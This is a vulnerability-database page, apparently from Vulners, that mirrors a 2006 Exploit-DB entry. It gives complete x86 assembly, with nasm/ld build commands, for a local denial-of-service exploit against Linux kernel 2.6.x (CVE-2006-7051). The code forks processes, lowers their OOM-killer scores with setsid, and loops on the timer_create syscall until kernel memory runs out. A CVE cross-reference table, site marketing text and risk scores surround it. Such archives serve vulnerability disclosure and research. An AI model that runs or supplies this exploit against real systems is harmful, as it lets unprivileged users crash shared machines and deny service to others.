Lucene search
+L

Linux Kernel 2.6.x - 'sys_timer_create()' Local Denial of Service

🗓️ 09 Apr 2006 00:00:00Reported by fingeroutType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

Linux Kernel 2.6.x 'sys_timer_create()' Local Denial of Service - Assembly Exploi

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-7051
24 Feb 200700:00
cve
cvelist
Cvelist
CVE-2006-7051
24 Feb 200700:00
cvelist
euvd
EUVD
EUVD-2006-7033
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-7051
24 Feb 200700:28
nvd
redhatcve
RedhatCVE
CVE-2006-7051
30 Oct 201510:10
redhatcve
ubuntucve
UbuntuCve
CVE-2006-7051
24 Feb 200700:28
ubuntucve
;nasm -f elf noHeaven.asm
;ld -s -o noHeaven noHeaven.o

section .text
   global _start

count   equ     8       ; threads count - do it quicker

_start:
       mov     ebx, count
       call    create_threads
       jmp     done
_pause:
       mov     eax,29
       int     0x80
       ret
create_threads:
       mov     eax,2
       int     0x80
       test    eax,eax
       jz      consume
       dec     ebx
       test    ebx,ebx
       jnz     create_threads
       ret
consume:
setsid:         ;       so we won't get counted as one thread in oom_killer()
       xor     ebx,ebx ;       each task will have about 20 oom_score which
       mov     eax,66 ;        is less than 'init' and others
       int     0x80
       push    eax
loopek:
       mov     eax,259
       mov     ebx,0
       mov     ecx,0
       mov     edx,esp
       int     0x80
       jmp     loopek
done:
       xor     ebx,ebx
       mov     eax,1
       int     0x80

; milw0rm.com [2006-04-09]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.9
EPSS0.00884
36